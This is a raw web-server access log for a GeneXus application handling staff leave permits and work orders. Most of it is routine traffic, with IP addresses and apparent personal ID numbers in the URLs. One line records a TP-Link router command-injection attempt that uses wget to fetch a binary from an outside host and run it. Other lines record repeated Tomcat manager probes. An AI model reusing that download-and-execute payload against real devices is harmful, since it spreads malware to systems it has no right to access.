200.54.103.162 - - [08/Apr/2024:10:27:54 -0300] "GET /cormun/servlet/permisosadjuntos?INS,13500244,P,20240408091956,, HTTP/1.1" 200 5988
200.54.103.162 - - [08/Apr/2024:10:27:54 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
200.54.103.162 - - [08/Apr/2024:10:28:02 -0300] "POST /cormun/servlet/permisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,INS,13500244,P,20240408091956,, HTTP/1.1" 200 116
200.54.103.162 - - [08/Apr/2024:10:28:02 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1039
200.54.103.162 - - [08/Apr/2024:10:28:02 -0300] "GET /cormun/servlet/trpermisosadjuntos?13500244,20240408091956,P, HTTP/1.1" 200 7167
200.54.103.162 - - [08/Apr/2024:10:28:08 -0300] "POST /cormun/servlet/trpermisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,13500244,20240408091956,P,,gx-no-cache=1712582685311 HTTP/1.1" 200 90
200.54.103.162 - - [08/Apr/2024:10:28:08 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 985
200.54.103.162 - - [08/Apr/2024:10:28:08 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 13596
200.54.103.162 - - [08/Apr/2024:10:28:11 -0300] "GET /cormun/servlet/trpermisosadjuntos?15259664,20240408092020,P, HTTP/1.1" 200 6667
200.54.103.162 - - [08/Apr/2024:10:28:13 -0300] "GET /cormun/servlet/permisosadjuntos?INS,15259664,P,20240408092020,, HTTP/1.1" 200 5994
200.54.103.162 - - [08/Apr/2024:10:28:13 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
200.54.103.162 - - [08/Apr/2024:10:28:20 -0300] "POST /cormun/servlet/permisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,INS,15259664,P,20240408092020,, HTTP/1.1" 200 116
200.54.103.162 - - [08/Apr/2024:10:28:20 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1038
200.54.103.162 - - [08/Apr/2024:10:28:20 -0300] "GET /cormun/servlet/trpermisosadjuntos?15259664,20240408092020,P, HTTP/1.1" 200 7175
200.54.103.162 - - [08/Apr/2024:10:28:26 -0300] "POST /cormun/servlet/trpermisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,15259664,20240408092020,P,,gx-no-cache=1712582704022 HTTP/1.1" 200 90
200.54.103.162 - - [08/Apr/2024:10:28:26 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 984
200.54.103.162 - - [08/Apr/2024:10:28:27 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 13596
200.54.103.162 - - [08/Apr/2024:10:28:32 -0300] "GET /cormun/servlet/trpermisosadjuntos?19840085,20240408092045,P, HTTP/1.1" 200 6665
200.54.103.162 - - [08/Apr/2024:10:28:34 -0300] "GET /cormun/servlet/permisosadjuntos?INS,19840085,P,20240408092045,, HTTP/1.1" 200 5991
200.54.103.162 - - [08/Apr/2024:10:28:34 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.43.89 - - [08/Apr/2024:10:28:35 -0300] "POST /cormun/servlet/trsolicitudot?1a07033fcf9d7219cbcfd50d4b7379db,,gx-no-cache=1712582711949 HTTP/1.1" 200 6164
200.54.103.162 - - [08/Apr/2024:10:28:39 -0300] "POST /cormun/servlet/permisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,INS,19840085,P,20240408092045,, HTTP/1.1" 200 116
200.54.103.162 - - [08/Apr/2024:10:28:39 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1038
200.54.103.162 - - [08/Apr/2024:10:28:39 -0300] "GET /cormun/servlet/trpermisosadjuntos?19840085,20240408092045,P, HTTP/1.1" 200 7172
181.212.43.89 - - [08/Apr/2024:10:28:40 -0300] "POST /cormun/servlet/trsolicitudot?1a07033fcf9d7219cbcfd50d4b7379db,,gx-no-cache=1712582717348 HTTP/1.1" 200 107
181.212.43.89 - - [08/Apr/2024:10:28:40 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2024,21184, HTTP/1.1" 200 10063
181.212.43.89 - - [08/Apr/2024:10:28:43 -0300] "GET /cormun/servlet/solicitudotadjuntos?INS,2024,21184,,1, HTTP/1.1" 200 6060
181.212.43.89 - - [08/Apr/2024:10:28:43 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.43.89 - - [08/Apr/2024:10:28:43 -0300] "GET /cormun/servlet/solicitudotadjuntos?f98b687a2d54d9c9b1cda92d9b04022c5859de6bb7a0c68986196ac168b7e182de3549816003021e978a0eccd1700e8d,gx-no-cache=1712582720755 HTTP/1.1" 200 30
181.212.43.89 - - [08/Apr/2024:10:28:43 -0300] "POST /cormun/servlet/solicitudotadjuntos?1a07033fcf9d7219cbcfd50d4b7379db,INS,2024,21184,,1,,gx-no-cache=1712582720770 HTTP/1.1" 200 3909
200.54.103.162 - - [08/Apr/2024:10:28:44 -0300] "POST /cormun/servlet/trpermisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,19840085,20240408092045,P,,gx-no-cache=1712582721687 HTTP/1.1" 200 90
200.54.103.162 - - [08/Apr/2024:10:28:44 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 984
200.54.103.162 - - [08/Apr/2024:10:28:44 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 13596
181.212.43.89 - - [08/Apr/2024:10:28:46 -0300] "POST /cormun/servlet/solicitudotadjuntos?gx-no-cache=1712582723044 HTTP/1.1" 200 26
181.212.43.89 - - [08/Apr/2024:10:28:48 -0300] "POST /cormun/servlet/solicitudotadjuntos?gx-no-cache=1712582725030 HTTP/1.1" 200 26
200.54.103.162 - - [08/Apr/2024:10:28:50 -0300] "GET /cormun/servlet/trpermisosadjuntos?18224100,20240408092107,P, HTTP/1.1" 200 6661
200.54.103.162 - - [08/Apr/2024:10:28:52 -0300] "GET /cormun/servlet/permisosadjuntos?INS,18224100,P,20240408092107,, HTTP/1.1" 200 5990
200.54.103.162 - - [08/Apr/2024:10:28:52 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.43.89 - - [08/Apr/2024:10:28:55 -0300] "GET /cormun/servlet/solicitudotadjuntos?f98b687a2d54d9c9b1cda92d9b04022c1440d9e240313d4958860b80eccc6779,gx-no-cache=1712582731928 HTTP/1.1" 200 30
181.212.43.89 - - [08/Apr/2024:10:28:55 -0300] "GET /cormun/servlet/solicitudotadjuntos?f98b687a2d54d9c9b1cda92d9b04022c1440d9e240313d4958860b80eccc6779,gx-no-cache=1712582731939 HTTP/1.1" 200 30
181.212.43.89 - - [08/Apr/2024:10:28:55 -0300] "POST /cormun/servlet/solicitudotadjuntos?1a07033fcf9d7219cbcfd50d4b7379db,INS,2024,21184,,1, HTTP/1.1" 200 116
181.212.43.89 - - [08/Apr/2024:10:28:55 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1019
181.212.43.89 - - [08/Apr/2024:10:28:55 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2024,21184, HTTP/1.1" 200 10225
181.212.43.89 - - [08/Apr/2024:10:29:00 -0300] "GET /cormun/servlet/solicitudotadjuntos?INS,2024,21184,,2, HTTP/1.1" 200 6058
181.212.43.89 - - [08/Apr/2024:10:29:00 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.43.89 - - [08/Apr/2024:10:29:01 -0300] "GET /cormun/servlet/solicitudotadjuntos?f98b687a2d54d9c9b1cda92d9b04022c5859de6bb7a0c68986196ac168b7e182de3549816003021e978a0eccd1700e8d,gx-no-cache=1712582738167 HTTP/1.1" 200 30
181.212.43.89 - - [08/Apr/2024:10:29:01 -0300] "POST /cormun/servlet/solicitudotadjuntos?1a07033fcf9d7219cbcfd50d4b7379db,INS,2024,21184,,2,,gx-no-cache=1712582738181 HTTP/1.1" 200 4053
200.54.103.162 - - [08/Apr/2024:10:29:01 -0300] "POST /cormun/servlet/permisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,INS,18224100,P,20240408092107,, HTTP/1.1" 200 116
200.54.103.162 - - [08/Apr/2024:10:29:01 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1039
200.54.103.162 - - [08/Apr/2024:10:29:01 -0300] "GET /cormun/servlet/trpermisosadjuntos?18224100,20240408092107,P, HTTP/1.1" 200 7168
200.54.103.162 - - [08/Apr/2024:10:29:07 -0300] "POST /cormun/servlet/trpermisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,18224100,20240408092107,P,,gx-no-cache=1712582744622 HTTP/1.1" 200 90
200.54.103.162 - - [08/Apr/2024:10:29:07 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 985
200.54.103.162 - - [08/Apr/2024:10:29:07 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 13596
200.54.103.162 - - [08/Apr/2024:10:29:10 -0300] "GET /cormun/servlet/trpermisosadjuntos?18224100,20240408092138,P, HTTP/1.1" 200 6661
200.54.103.162 - - [08/Apr/2024:10:29:12 -0300] "GET /cormun/servlet/permisosadjuntos?INS,18224100,P,20240408092138,, HTTP/1.1" 200 5989
200.54.103.162 - - [08/Apr/2024:10:29:12 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
200.54.103.162 - - [08/Apr/2024:10:29:18 -0300] "POST /cormun/servlet/permisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,INS,18224100,P,20240408092138,, HTTP/1.1" 200 116
200.54.103.162 - - [08/Apr/2024:10:29:18 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1039
200.54.103.162 - - [08/Apr/2024:10:29:18 -0300] "GET /cormun/servlet/trpermisosadjuntos?18224100,20240408092138,P, HTTP/1.1" 200 7170
200.54.103.162 - - [08/Apr/2024:10:29:23 -0300] "POST /cormun/servlet/trpermisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,18224100,20240408092138,P,,gx-no-cache=1712582760814 HTTP/1.1" 200 90
200.54.103.162 - - [08/Apr/2024:10:29:23 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 985
200.54.103.162 - - [08/Apr/2024:10:29:23 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 13596
200.54.103.162 - - [08/Apr/2024:10:29:29 -0300] "GET /cormun/servlet/trpermisosadjuntos?8494476,20240408092203,P, HTTP/1.1" 200 6660
200.54.103.162 - - [08/Apr/2024:10:29:31 -0300] "GET /cormun/servlet/permisosadjuntos?INS,8494476,P,20240408092203,, HTTP/1.1" 200 5986
200.54.103.162 - - [08/Apr/2024:10:29:31 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.43.89 - - [08/Apr/2024:10:29:38 -0300] "POST /cormun/servlet/solicitudotadjuntos?1a07033fcf9d7219cbcfd50d4b7379db,INS,2024,21184,,2,,gx-no-cache=1712582775037 HTTP/1.1" 200 93
181.212.43.89 - - [08/Apr/2024:10:29:38 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1020
181.212.43.89 - - [08/Apr/2024:10:29:38 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2024,21184, HTTP/1.1" 200 10227
200.54.103.162 - - [08/Apr/2024:10:29:39 -0300] "POST /cormun/servlet/permisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,INS,8494476,P,20240408092203,, HTTP/1.1" 200 116
200.54.103.162 - - [08/Apr/2024:10:29:39 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1039
200.54.103.162 - - [08/Apr/2024:10:29:39 -0300] "GET /cormun/servlet/trpermisosadjuntos?8494476,20240408092203,P, HTTP/1.1" 200 7161
181.212.43.89 - - [08/Apr/2024:10:29:41 -0300] "POST /cormun/servlet/trsolicitudadjuntos?1a07033fcf9d7219cbcfd50d4b7379db,2024,21184,,gx-no-cache=1712582777976 HTTP/1.1" 200 90
181.212.43.89 - - [08/Apr/2024:10:29:41 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 963
181.212.43.89 - - [08/Apr/2024:10:29:41 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 9000
200.54.103.162 - - [08/Apr/2024:10:29:45 -0300] "POST /cormun/servlet/trpermisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,8494476,20240408092203,P,,gx-no-cache=1712582782167 HTTP/1.1" 200 90
200.54.103.162 - - [08/Apr/2024:10:29:45 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 983
200.54.103.162 - - [08/Apr/2024:10:29:45 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 13596
200.54.103.162 - - [08/Apr/2024:10:29:49 -0300] "GET /cormun/servlet/trpermisosadjuntos?17199981,20240408092224,P, HTTP/1.1" 200 6671
200.54.103.162 - - [08/Apr/2024:10:29:50 -0300] "GET /cormun/servlet/permisosadjuntos?INS,17199981,P,20240408092224,, HTTP/1.1" 200 5997
200.54.103.162 - - [08/Apr/2024:10:29:50 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.43.89 - - [08/Apr/2024:10:29:54 -0300] "POST /cormun/servlet/trsolicitudot?1a07033fcf9d7219cbcfd50d4b7379db,,gx-no-cache=1712582791781 HTTP/1.1" 200 5834
181.212.43.89 - - [08/Apr/2024:10:29:54 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
181.212.43.89 - - [08/Apr/2024:10:29:54 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
181.212.43.89 - - [08/Apr/2024:10:29:54 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
181.212.43.89 - - [08/Apr/2024:10:29:54 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
181.212.43.89 - - [08/Apr/2024:10:29:55 -0300] "POST /cormun/servlet/trsolicitudot?1a07033fcf9d7219cbcfd50d4b7379db,,gx-no-cache=1712582791882 HTTP/1.1" 200 5779
200.54.103.162 - - [08/Apr/2024:10:29:55 -0300] "POST /cormun/servlet/permisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,INS,17199981,P,20240408092224,, HTTP/1.1" 200 116
200.54.103.162 - - [08/Apr/2024:10:29:55 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1040
200.54.103.162 - - [08/Apr/2024:10:29:56 -0300] "GET /cormun/servlet/trpermisosadjuntos?17199981,20240408092224,P, HTTP/1.1" 200 7176
181.212.43.89 - - [08/Apr/2024:10:29:56 -0300] "POST /cormun/servlet/trsolicitudot?1a07033fcf9d7219cbcfd50d4b7379db,,gx-no-cache=1712582792917 HTTP/1.1" 200 4580
181.212.43.89 - - [08/Apr/2024:10:29:56 -0300] "POST /cormun/servlet/trsolicitudot?1a07033fcf9d7219cbcfd50d4b7379db,,gx-no-cache=1712582793048 HTTP/1.1" 200 4340
181.212.43.89 - - [08/Apr/2024:10:30:00 -0300] "GET /cormun/servlet/solicitudot?INS,0,0,false, HTTP/1.1" 200 16002
200.54.103.162 - - [08/Apr/2024:10:30:01 -0300] "POST /cormun/servlet/trpermisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,17199981,20240408092224,P,,gx-no-cache=1712582799095 HTTP/1.1" 200 90
200.54.103.162 - - [08/Apr/2024:10:30:02 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 985
200.54.103.162 - - [08/Apr/2024:10:30:02 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 13596
200.54.103.162 - - [08/Apr/2024:10:30:06 -0300] "GET /cormun/servlet/trpermisosadjuntos?17399914,20240408092342,P, HTTP/1.1" 200 6672
209.141.55.133 - tomcat [08/Apr/2024:10:30:07 -0300] "GET /manager/html HTTP/1.1" 403 3196
200.54.103.162 - - [08/Apr/2024:10:30:08 -0300] "GET /cormun/servlet/permisosadjuntos?INS,17399914,P,20240408092342,, HTTP/1.1" 200 5997
200.54.103.162 - - [08/Apr/2024:10:30:08 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
200.54.103.162 - - [08/Apr/2024:10:30:13 -0300] "POST /cormun/servlet/permisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,INS,17399914,P,20240408092342,, HTTP/1.1" 200 116
200.54.103.162 - - [08/Apr/2024:10:30:13 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1040
200.54.103.162 - - [08/Apr/2024:10:30:13 -0300] "GET /cormun/servlet/trpermisosadjuntos?17399914,20240408092342,P, HTTP/1.1" 200 7177
200.54.103.162 - - [08/Apr/2024:10:30:17 -0300] "POST /cormun/servlet/trpermisosadjuntos?5c8aeae0aebeee181929e2e41df2c894,17399914,20240408092342,P,,gx-no-cache=1712582814934 HTTP/1.1" 200 90
200.54.103.162 - - [08/Apr/2024:10:30:17 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 985
200.54.103.162 - - [08/Apr/2024:10:30:17 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 13596
200.54.103.162 - - [08/Apr/2024:10:30:22 -0300] "POST /cormun/servlet/trpermisosgoce?5c8aeae0aebeee181929e2e41df2c894,gx-no-cache=1712582819250 HTTP/1.1" 200 10773
200.54.103.162 - - [08/Apr/2024:10:30:22 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
200.54.103.162 - - [08/Apr/2024:10:30:22 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
200.54.103.162 - - [08/Apr/2024:10:30:22 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
200.54.103.162 - - [08/Apr/2024:10:30:22 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
200.54.103.162 - - [08/Apr/2024:10:30:23 -0300] "POST /cormun/servlet/trpermisosgoce?5c8aeae0aebeee181929e2e41df2c894,gx-no-cache=1712582820664 HTTP/1.1" 200 10766
200.54.103.162 - - [08/Apr/2024:10:30:24 -0300] "POST /cormun/servlet/trpermisosgoce?5c8aeae0aebeee181929e2e41df2c894,gx-no-cache=1712582821543 HTTP/1.1" 200 10754
200.54.103.162 - - [08/Apr/2024:10:30:25 -0300] "POST /cormun/servlet/trpermisosgoce?5c8aeae0aebeee181929e2e41df2c894,gx-no-cache=1712582822399 HTTP/1.1" 200 10751
200.54.103.162 - - [08/Apr/2024:10:30:26 -0300] "POST /cormun/servlet/trpermisosgoce?5c8aeae0aebeee181929e2e41df2c894,gx-no-cache=1712582823199 HTTP/1.1" 200 10739
200.54.103.162 - - [08/Apr/2024:10:30:27 -0300] "POST /cormun/servlet/trpermisosgoce?5c8aeae0aebeee181929e2e41df2c894,gx-no-cache=1712582824118 HTTP/1.1" 200 10730
200.54.103.162 - - [08/Apr/2024:10:30:28 -0300] "POST /cormun/servlet/trpermisosgoce?5c8aeae0aebeee181929e2e41df2c894,gx-no-cache=1712582825703 HTTP/1.1" 200 10726
200.54.103.162 - - [08/Apr/2024:10:30:30 -0300] "POST /cormun/servlet/trpermisosgoce?5c8aeae0aebeee181929e2e41df2c894,gx-no-cache=1712582827079 HTTP/1.1" 200 10717
200.54.103.162 - - [08/Apr/2024:10:30:31 -0300] "POST /cormun/servlet/trpermisosgoce?5c8aeae0aebeee181929e2e41df2c894,gx-no-cache=1712582828167 HTTP/1.1" 200 10679
200.54.103.162 - - [08/Apr/2024:10:30:39 -0300] "GET /cormun/servlet/trautorizarpermisogoce? HTTP/1.1" 200 9681
200.54.103.162 - - [08/Apr/2024:10:30:39 -0300] "GET /cormun/static/gxcfg.js?2020121645532 HTTP/1.1" 200 953
200.54.103.162 - - [08/Apr/2024:10:30:39 -0300] "GET /cormun/static/trautorizarpermisogoce.js?2020121651492 HTTP/1.1" 200 34948
200.54.103.162 - - [08/Apr/2024:10:30:43 -0300] "POST /cormun/servlet/trautorizarpermisogoce?5c8aeae0aebeee181929e2e41df2c894,,gx-no-cache=1712582840032 HTTP/1.1" 200 6727
200.54.103.162 - - [08/Apr/2024:10:30:43 -0300] "POST /cormun/servlet/trautorizarpermisogoce?5c8aeae0aebeee181929e2e41df2c894,,gx-no-cache=1712582840757 HTTP/1.1" 200 6527
200.54.103.162 - - [08/Apr/2024:10:30:44 -0300] "POST /cormun/servlet/trautorizarpermisogoce?5c8aeae0aebeee181929e2e41df2c894,,gx-no-cache=1712582841509 HTTP/1.1" 200 6332
200.54.103.162 - - [08/Apr/2024:10:30:45 -0300] "POST /cormun/servlet/trautorizarpermisogoce?5c8aeae0aebeee181929e2e41df2c894,,gx-no-cache=1712582842236 HTTP/1.1" 200 5964
200.54.103.162 - - [08/Apr/2024:10:30:45 -0300] "POST /cormun/servlet/trautorizarpermisogoce?5c8aeae0aebeee181929e2e41df2c894,,gx-no-cache=1712582842893 HTTP/1.1" 200 5760
200.54.103.162 - - [08/Apr/2024:10:30:46 -0300] "POST /cormun/servlet/trautorizarpermisogoce?5c8aeae0aebeee181929e2e41df2c894,,gx-no-cache=1712582843588 HTTP/1.1" 200 5527
200.54.103.162 - - [08/Apr/2024:10:30:47 -0300] "POST /cormun/servlet/trautorizarpermisogoce?5c8aeae0aebeee181929e2e41df2c894,,gx-no-cache=1712582844245 HTTP/1.1" 200 5280
200.54.103.162 - - [08/Apr/2024:10:30:47 -0300] "POST /cormun/servlet/trautorizarpermisogoce?5c8aeae0aebeee181929e2e41df2c894,,gx-no-cache=1712582844916 HTTP/1.1" 200 4521
152.230.42.226 - - [08/Apr/2024:10:31:12 -0300] "GET /cormun/servlet/trcontratounov2? HTTP/1.1" 200 5906
152.230.42.226 - - [08/Apr/2024:10:31:13 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1735
152.230.42.226 - - [08/Apr/2024:10:31:17 -0300] "POST /cormun/servlet/hlogin?800509b96083855c8bc0a38c5a4931c1,gx-no-cache=1712582873928 HTTP/1.1" 200 90
152.230.42.226 - - [08/Apr/2024:10:31:17 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 954
152.230.42.226 - - [08/Apr/2024:10:31:18 -0300] "GET /cormun/servlet/trcontratounov2 HTTP/1.1" 200 17502
181.212.43.89 - - [08/Apr/2024:10:31:19 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1712582876571 HTTP/1.1" 200 4022
181.212.43.89 - - [08/Apr/2024:10:31:19 -0300] "POST /cormun/servlet/solicitudot?1a07033fcf9d7219cbcfd50d4b7379db,INS,0,0,false,,gx-no-cache=1712582876688 HTTP/1.1" 200 12590
181.212.43.89 - - [08/Apr/2024:10:31:20 -0300] "GET /cormun/servlet/solicitudot?f98b687a2d54d9c9b1cda92d9b04022c4bca4e1f494f6871705353e9c5ef9938c78229c1478b82554c442a74a01c3754,gx-no-cache=1712582877606 HTTP/1.1" 200 30
200.54.103.162 - - [08/Apr/2024:10:31:42 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1747
190.171.153.26 - - [08/Apr/2024:10:32:29 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 9357
190.171.153.26 - - [08/Apr/2024:10:32:29 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 9356
190.171.153.26 - - [08/Apr/2024:10:32:31 -0300] "POST /cormun/servlet/trlicencias?978a9f29f5d842d6242e553d640ebb79,,gx-no-cache=1712582957818 HTTP/1.1" 200 6733
209.141.55.133 - tomcat [08/Apr/2024:10:44:44 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.153.26 - - [08/Apr/2024:10:50:57 -0300] "POST /cormun/servlet/trlicencias?978a9f29f5d842d6242e553d640ebb79,,gx-no-cache=1712584063367 HTTP/1.1" 200 6733
190.171.153.26 - - [08/Apr/2024:10:50:58 -0300] "POST /cormun/servlet/trlicencias?978a9f29f5d842d6242e553d640ebb79,,gx-no-cache=1712584064491 HTTP/1.1" 200 6733
190.171.153.26 - - [08/Apr/2024:10:51:23 -0300] "POST /cormun/servlet/trlicencias?978a9f29f5d842d6242e553d640ebb79,,gx-no-cache=1712584089951 HTTP/1.1" 200 6733
181.212.43.89 - - [08/Apr/2024:10:53:45 -0300] "POST /cormun/servlet/solicitudot?1a07033fcf9d7219cbcfd50d4b7379db,INS,0,0,false,,gx-no-cache=1712584222645 HTTP/1.1" 200 12928
181.212.43.89 - - [08/Apr/2024:10:53:46 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_994d53_40x100.png HTTP/1.1" 404 1097
181.212.43.89 - - [08/Apr/2024:10:53:46 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_ebccce_256x240.png HTTP/1.1" 404 1089
185.224.128.34 - - [08/Apr/2024:10:54:50 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 1013
190.171.152.138 - - [08/Apr/2024:10:57:21 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1720
190.171.152.138 - - [08/Apr/2024:10:57:32 -0300] "POST /cormun/servlet/hlogin?dd68cef9b3ea1f2fda1c67f175ad1bfe,gx-no-cache=1712584449626 HTTP/1.1" 200 90
190.171.152.138 - - [08/Apr/2024:10:57:32 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
190.171.152.138 - - [08/Apr/2024:10:57:32 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3864
190.171.152.138 - - [08/Apr/2024:10:57:37 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 9309
190.171.152.138 - - [08/Apr/2024:10:57:40 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6727
190.171.152.138 - - [08/Apr/2024:10:57:40 -0300] "GET /cormun/static/gxcfg.js?20201215124560 HTTP/1.1" 200 953
190.171.152.138 - - [08/Apr/2024:10:57:40 -0300] "GET /cormun/static/Resources/prompt.gif HTTP/1.1" 200 902
190.171.152.138 - - [08/Apr/2024:10:57:40 -0300] "GET /cormun/static/permisogoce.js?20201215124939 HTTP/1.1" 200 27790
190.171.152.138 - - [08/Apr/2024:10:57:57 -0300] "GET /cormun/servlet/permisogoce?6e58085a03ac777908a219448899894bc180c521f2ae08dfa788d4cff772991644fa2207c13b38f0ba35100a1bda45cb312164b6bdcc6480d9bd59943f1d24ae,gx-no-cache=1712584474565 HTTP/1.1" 200 226
190.171.152.138 - - [08/Apr/2024:10:57:57 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.152.138 - - [08/Apr/2024:10:57:57 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.152.138 - - [08/Apr/2024:10:57:57 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_994d53_40x100.png HTTP/1.1" 404 1097
190.171.152.138 - - [08/Apr/2024:10:57:57 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_ebccce_256x240.png HTTP/1.1" 404 1089
209.141.55.133 - tomcat [08/Apr/2024:10:58:17 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.152.138 - - [08/Apr/2024:10:58:17 -0300] "GET /cormun/servlet/permisogoce?6e58085a03ac777908a219448899894bf819c3f4d3ae520b3cba3c6b447f7c1a44fa2207c13b38f0ba35100a1bda45cb312164b6bdcc6480d9bd59943f1d24ae,gx-no-cache=1712584494814 HTTP/1.1" 200 74
190.171.152.138 - - [08/Apr/2024:10:58:20 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.153.26 - - [08/Apr/2024:10:58:29 -0300] "POST /cormun/servlet/trlicencias?978a9f29f5d842d6242e553d640ebb79,,gx-no-cache=1712584515799 HTTP/1.1" 200 6733
190.171.152.138 - - [08/Apr/2024:10:58:45 -0300] "GET /cormun/servlet/permisogoce?6e58085a03ac777908a219448899894b94fb063630181dfe05b092dcb2975758adb4abebd30c09fe2fa1b9caa8a3b113e35a2dab6a041b5128a4be6bfa964c77,gx-no-cache=1712584522883 HTTP/1.1" 200 47
190.171.152.138 - - [08/Apr/2024:10:58:54 -0300] "POST /cormun/servlet/permisogoce?dd68cef9b3ea1f2fda1c67f175ad1bfe,INS,0,,,,gx-no-cache=1712584530495 HTTP/1.1" 200 93
190.171.152.138 - - [08/Apr/2024:10:58:54 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1008
190.171.152.138 - - [08/Apr/2024:10:58:54 -0300] "GET /cormun/static/gxcfg.js?20221129846035 HTTP/1.1" 200 953
190.171.152.138 - - [08/Apr/2024:10:58:54 -0300] "GET /cormun/static/hpexe_return.js?20221129846037 HTTP/1.1" 200 1633
190.171.152.138 - - [08/Apr/2024:10:58:55 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 9561
190.171.152.138 - - [08/Apr/2024:10:58:55 -0300] "GET /cormun//static/Resources/PXToolsGridUpdate.png HTTP/1.1" 200 470
